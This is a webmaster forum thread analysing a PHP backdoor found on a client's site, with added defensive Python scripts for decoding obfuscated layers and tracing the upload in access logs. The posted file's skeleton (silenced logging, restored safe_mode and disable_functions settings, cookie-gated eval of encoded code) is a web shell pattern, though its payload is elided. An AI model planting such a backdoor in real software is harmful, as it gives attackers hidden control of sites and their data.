
Help reading virus

Found PHP file with virus, can anyone interpret what it is doing?


Demaestro

10:20 pm on May 4, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Hey all,

I am pretty weak at PHP but I have a client with a site that has an infected file in it.

I have grepped the site and I can't find anything referencing it, but I still have to check some of the MD5 and Base64 stuff to make sure calls to this file aren't being obfuscated.

This is what is in the file. Does anyone recognize it, or can anyone give me some insight into what it is doing? My eye tells me it is trying to relax the PHP settings to allow it to hand off a bad file in a cookie or something, but I am guessing here.

Also would anyone know how it would have gotten in there? Known PHP or Joomla exploit? Or is it more likely that someone with access to the site is infected with something?

Thanks for any time you spend.

****************File****************
<?php
// Silence every PHP error so nothing about this file shows up on the page or in logs.
error_reporting(0);

$language='eng';

$auth = 0;

// MD5 hashes of the shell's own login name and password.
$name='3b1147d920f9e49d74a60245e8323cbe';
$pass='febfb75ba8a3fe2067d774b849695ac2';

// Attempt to put the host's hardening directives (safe_mode, open_basedir,
// disable_functions, allow_url_fopen, ...) back to their php.ini values, undoing any
// tightening applied at runtime. The @ hides the warning when a directive cannot be changed.
@ini_restore('safe_mode');
@ini_restore('open_basedir');
@ini_restore('safe_mode_include_dir');
@ini_restore('safe_mode_exec_dir');
@ini_restore('disable_functions');
@ini_restore('allow_url_fopen');

// Turn error logging off as well.
@ini_set('error_log',NULL);
@ini_set('log_errors',0);

// Gate: only a visitor whose "name" cookie hashes to this MD5 gets the hidden payload.
// The payload is base64-encoded, raw-deflate-compressed PHP that is then run with eval().
if(md5($_COOKIE['name'])=='6c18b2c7a92538f78160d3d096bba29f'){
eval(gzinflate(base64_decode('a huge freaking string'))); }

****************/File****************

eelixduppy

12:24 am on May 5, 2011 (gmt 0)



Do an echo of the string to see what they are executing:

echo gzinflate(base64_decode('a huge freaking string'));


They have compressed PHP code that has also been encoded in base64. Once they reverse that, they evaluate that code.

Also, seems like they restore all the default values for those configuration settings at top, which may have limited what they are able to do with the evaluated code had they not reset them.
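A safer way to do what eelixduppy suggests is to never feed the string to PHP at all. The following is an added example, not code from this thread: a small Python script that peels the eval(gzinflate(base64_decode('...'))) wrapper off a PHP file (including nested layers, which this kind of shell often has) and checks the MD5 cookie gate. gzinflate() in PHP is raw DEFLATE with no zlib header, which is why zlib.decompress is called with wbits=-15. The payload it decodes is constructed inline (a harmless echo wrapped twice); the real string from the post is not included, and the gate hash it tests against is the MD5 of an empty string, not the one from the file.

```python
import base64
import hashlib
import re
import zlib

# Matches the eval(gzinflate(base64_decode('...'))) wrapper as it appears in the posted file.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([^']+)'\s*\)\s*\)\s*\)", re.S
)


def gzinflate(data: bytes) -> bytes:
    """PHP's gzinflate(): raw DEFLATE stream, no zlib/gzip header (wbits=-15)."""
    return zlib.decompress(data, -15)


def unwrap_once(php: str):
    """Return (decoded_source, True) if php contains the wrapper, else (php, False)."""
    m = WRAPPER.search(php)
    if not m:
        return php, False
    decoded = gzinflate(base64.b64decode(m.group(1)))
    return decoded.decode("utf-8", "replace"), True


def unwrap_all(php: str, max_layers: int = 20):
    """Peel nested eval/gzinflate/base64 layers without executing anything.

    Returns (innermost_source, number_of_layers_removed)."""
    layers = 0
    while layers < max_layers:
        php, found = unwrap_once(php)
        if not found:
            break
        layers += 1
    return php, layers


def cookie_gate_matches(cookie_name: str, expected_md5: str) -> bool:
    """Mirror the shell's check: md5($_COOKIE['name']) == '<hash>'."""
    return hashlib.md5(cookie_name.encode()).hexdigest() == expected_md5.lower()


# --- constructed sample input (not the payload from the post) -----------------
def gzdeflate(data: bytes) -> bytes:
    """PHP's gzdeflate(): raw DEFLATE, used only to build the sample below."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def wrap(php: str) -> str:
    """Produce one eval(gzinflate(base64_decode('...'))); layer around php."""
    blob = base64.b64encode(gzdeflate(php.encode())).decode()
    return "eval(gzinflate(base64_decode('%s')));" % blob


INNER = "<?php echo 'hello from the inner layer'; ?>"
# A harmless script wrapped twice, with the same preamble the posted file has.
SAMPLE_FILE = "<?php\nerror_reporting(0);\n" + wrap(wrap(INNER)) + "\n"


if __name__ == "__main__":
    source, layers = unwrap_all(SAMPLE_FILE)
    print("layers removed:", layers)
    print(source)
```

To use it on a real file, read the file into a string and pass it to unwrap_all(); the result is text you can read, grep and diff, and nothing in it has been executed. If a layer uses a different wrapper (str_rot13, gzuncompress, which expects a zlib header, or a variable-named function), the regex and gzinflate() need adjusting; the script deliberately stops rather than guessing.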

Demaestro

3:51 pm on May 5, 2011 (gmt 0)




eelix,

That was a great suggestion. I ran it locally and echoed out that string, and it creates a bunch of forms and tries to pre-populate them with data about the website.

It looks for specific files like "passw.dic" which I imagine is a default file for some CMS.

It also reads from configuration files to reveal db info and the like.

So I guess I get to change all that stuff now.

The good news is it doesn't seem to be trying to infect users of the site; it is only trying to open the site up to a worse attack.

If any senior members want to have a look at the really long string I will sticky it to you.

Please don't ask if you aren't an established member, I am not looking to help spread this thing.

eelixduppy

8:06 pm on May 5, 2011 (gmt 0)



Be interested to know how it got there in the first place. I'm going to assume you are running some open-source software with a vulnerability that was exploited, perhaps?

>> md5($_COOKIE['name'])=='6c18b2c7a92538f78160d3d096bba29f'

A lookup of that hash produces nothing, I was really interested in knowing what name they chose for themselves to execute that code. It's some predefined name they would register with so that when they log in they get the details of your site without any other user noticing anything strange. Oh well, doesn't really matter what it is, as long as you're taking care of it now. :)

Demaestro

8:50 pm on May 5, 2011 (gmt 0)




So far I have removed the bad file, changed all passwords, changed all DB credentials.... and because of the nature of the exploit I had a 3 month old copy of the site, so I did a diff on them and I am still wading through that.

I now need to be sure someone didn't come in manually and change the action of any forms especially ones within the e-commerce component.

I took this site on to do a couple of feature additions, but I don't control the hosting. I opened a ticket with them and they said they have seen this same thing in a couple of CMSs lately... makes me wonder if those were on the same shared server this site is on.

coopster

1:48 pm on May 6, 2011 (gmt 0)

WebmasterWorld Administrator 10+ Year Member



The bigger question is, how did the file get there in the first place? Have a look at the timestamp on the file and cross-reference (grep) your server logs (including ftp/sftp logs) for the timestamp as well as the file name (the filemtime may not indicate actual placement of the file in the file system).
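Coopster's point about not trusting the file's mtime is the key one, so the useful anchor is the first request for the file in the web server log rather than the filesystem timestamp. The script below is an added example, not from this thread: it parses combined-format access log lines, finds the earliest hit on the dropped file, and lists the POST requests that arrived in the hour before it, which is where an upload through a CMS admin or media form usually shows up. The log lines, the IP addresses and the backdoor path /images/stories/cache.php are all constructed for the example; the thread does not give the real file name.

```python
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" format; the timezone offset is parsed so comparisons are correct.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line: str):
    """Return a dict for a combined-format line, or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
        "raw": line,
    }


def triage(lines, backdoor_name: str, window: timedelta = timedelta(hours=1)):
    """Locate the first request for the dropped file and the POSTs that preceded it.

    Returns {"first_hit": entry|None, "hits": [...], "suspects": [...]} where
    suspects are POST requests to other paths inside `window` before the first hit."""
    entries = [e for e in map(parse_line, lines) if e]
    hits = sorted((e for e in entries if backdoor_name in e["path"]), key=lambda e: e["ts"])
    if not hits:
        return {"first_hit": None, "hits": [], "suspects": []}
    first = hits[0]
    suspects = [
        e for e in entries
        if e["method"] == "POST"
        and backdoor_name not in e["path"]
        and first["ts"] - window <= e["ts"] < first["ts"]
    ]
    return {"first_hit": first, "hits": hits, "suspects": suspects}


def attacker_ips(result) -> list:
    """Distinct source addresses seen touching the file or in the suspect POSTs."""
    return sorted({e["ip"] for e in result["hits"] + result["suspects"]})


# Constructed sample log (not real traffic): an admin login, two POSTs to the Joomla
# media component, then the first GET of the dropped file from the same address.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/May/2011:02:14:07 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/May/2011:02:14:31 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/May/2011:02:15:02 +0000] "POST /administrator/index.php?option=com_media HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/May/2011:02:15:40 +0000] "GET /images/stories/cache.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/May/2011:09:30:12 +0000] "GET / HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [02/May/2011:11:01:55 +0000] "POST /images/stories/cache.php HTTP/1.1" 200 7700 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    result = triage(SAMPLE_LOG, "cache.php")
    print("first hit:", result["first_hit"]["raw"])
    for e in result["suspects"]:
        print("suspect POST:", e["raw"])
    print("addresses:", attacker_ips(result))
```

On a real server, feed it the full access log for the period (and rotate in older compressed logs), then check the FTP/SFTP logs and the CMS's own admin log for the same addresses and minutes. If the first hit on the file comes from an address that never appears in a POST beforehand, the upload most likely did not come through this site's web front end, which is the shared-hosting scenario Demaestro is worried about.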

Demaestro

2:28 pm on May 6, 2011 (gmt 0)




coop,

That is something I am going to be doing today. I am very curious as to how it got there. My suspicions are that it came from a backdoor from another shared site on the server but I am guessing.

This is the first time I have ever dealt with this in over 10 years. It makes me want to go hug my systems admin.